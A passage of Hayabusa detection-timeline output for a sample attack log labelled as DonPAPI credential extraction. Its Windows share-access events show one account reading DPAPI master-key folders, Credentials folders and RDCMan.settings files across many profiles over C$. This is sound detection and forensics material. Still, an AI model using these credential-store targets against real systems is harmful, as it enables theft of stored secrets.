admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 